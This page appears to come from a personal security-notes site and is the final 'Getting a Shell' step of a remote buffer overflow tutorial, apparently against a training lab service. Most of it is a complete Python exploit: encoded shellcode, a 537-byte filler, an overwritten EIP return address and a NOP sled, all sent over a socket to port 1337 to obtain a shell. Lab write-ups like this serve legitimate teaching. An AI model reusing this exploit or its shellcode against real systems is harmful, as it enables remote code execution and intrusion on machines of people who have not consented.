LogoLogo
  • 🤩Welcome!
  • Buffer overflow
    • Remote Buffer Overflow
      • Crashing the Application
      • Controlling the EIP
      • Finding Bad Characters
      • Finding a Return Address
      • Generating Shellcode
      • Getting a Shell
  • Wireless Penetration Testing
    • Wifi Pineapple - Tetra
      • Setup
      • Firmware Upgrade
      • Capturing Wireless Handshake
      • Cracking WPA2 Handshake
      • PineAP
      • Modules
  • PortSwigger Labs
    • Authentication
      • Username enumeration via different responses
      • Username enumeration via subtly different responses
      • Username enumeration via response timing
  • TryHackMe
    • 🎄Advent of Cyber 3 (2021)
      • [Day 1] Save The Gifts
      • [Day 2] Elf HR Problems
      • [Day 3] Christmas Blackout
      • [Day 4] Santa's Running Behind
      • [Day 5] Pesky Elf Forum
      • [Day 6] Patch Management Is Hard
      • [Day 7] Migration Without Security
      • [Day 8] Santa's Bag of Toys
      • [Day 9] Where Is All This Data Going
  • Google Cloud Computing
    • ☁️Cloud Computing Fundamentals
      • Getting Started with Cloud Shell and gcloud
      • Creating a Virtual Machine
      • App Engine: Qwik Start - Python
      • Cloud Functions: Qwik Start - Command Line
      • Kubernetes Engine: Qwik Start
      • Set Up Network and HTTP Load Balancers
Powered by GitBook
On this page
  • Adding Nops & Payload
  • payload.py
  • Exploitation

Was this helpful?

  1. Buffer overflow
  2. Remote Buffer Overflow

Getting a Shell

With some final modification to the POC, a shell will be obtained.

Adding Nops & Payload

Now that we have all parts to the puzzle, all we have to do is modify the code one last time to include our newly generated payload, add some NOPs (“\x90”) to give some padding for our payload, and run it!

payload.py

#!/usr/bin/python
import socket

try:
    print ("\nSending evil buffer...")

    payload = ("\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
    "\x65\x02\xba\x95\x83\xee\xfc\xe2\xf4\x99\xea\x38\x95\x65\x02"
    "\xda\x1c\x80\x33\x7a\xf1\xee\x52\x8a\x1e\x37\x0e\x31\xc7\x71"
    "\x89\xc8\xbd\x6a\xb5\xf0\xb3\x54\xfd\x16\xa9\x04\x7e\xb8\xb9"
    "\x45\xc3\x75\x98\x64\xc5\x58\x67\x37\x55\x31\xc7\x75\x89\xf0"
    "\xa9\xee\x4e\xab\xed\x86\x4a\xbb\x44\x34\x89\xe3\xb5\x64\xd1"
    "\x31\xdc\x7d\xe1\x80\xdc\xee\x36\x31\x94\xb3\x33\x45\x39\xa4"
    "\xcd\xb7\x94\xa2\x3a\x5a\xe0\x93\x01\xc7\x6d\x5e\x7f\x9e\xe0"
    "\x81\x5a\x31\xcd\x41\x03\x69\xf3\xee\x0e\xf1\x1e\x3d\x1e\xbb"
    "\x46\xee\x06\x31\x94\xb5\x8b\xfe\xb1\x41\x59\xe1\xf4\x3c\x58"
    "\xeb\x6a\x85\x5d\xe5\xcf\xee\x10\x51\x18\x38\x6a\x89\xa7\x65"
    "\x02\xd2\xe2\x16\x30\xe5\xc1\x0d\x4e\xcd\xb3\x62\xfd\x6f\x2d"
    "\xf5\x03\xba\x95\x4c\xc6\xee\xc5\x0d\x2b\x3a\xfe\x65\xfd\x6f"
    "\xc5\x35\x52\xea\xd5\x35\x42\xea\xfd\x8f\x0d\x65\x75\x9a\xd7"
    "\x2d\xff\x60\x6a\x7a\x3d\x65\x6e\xd2\x97\x65\x02\x8f\x1c\x83"
    "\x68\xaa\xc3\x32\x6a\x23\x30\x11\x63\x45\x40\xe0\xc2\xce\x99"
    "\x9a\x4c\xb2\xe0\x89\x6a\x4a\x20\xc7\x54\x45\x40\x0d\x61\xd7"
    "\xf1\x65\x8b\x59\xc2\x32\x55\x8b\x63\x0f\x10\xe3\xc3\x87\xff"
    "\xdc\x52\x21\x26\x86\x94\x64\x8f\xfe\xb1\x75\xc4\xba\xd1\x31"
    "\x52\xec\xc3\x33\x44\xec\xdb\x33\x54\xe9\xc3\x0d\x7b\x76\xaa"
    "\xe3\xfd\x6f\x1c\x85\x4c\xec\xd3\x9a\x32\xd2\x9d\xe2\x1f\xda"
    "\x6a\xb0\xb9\x5a\x88\x4f\x08\xd2\x33\xf0\xbf\x27\x6a\xb0\x3e"
    "\xbc\xe9\x6f\x82\x41\x75\x10\x07\x01\xd2\x76\x70\xd5\xff\x65"
    "\x51\x45\x40")
    
    prefix = "OVERFLOW10 "
    filler = "A" * 537 
    eip = "\xaf\x11\x50\x62" * 4 #0x625011AF
    nop = "\x90" * 32
    buffer = prefix + filler + eip + nop + payload

    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

    s.connect(("windows.box", 1337))
    s.send(buffer)

    s.close()

    print ("\nDone!")
  
except:
    print ("\nCould not connect!")

Exploitation

python payload.py

And...there we go! We've gotta shell 😊

PreviousGenerating ShellcodeNextWifi Pineapple - Tetra

Last updated 3 years ago

Was this helpful?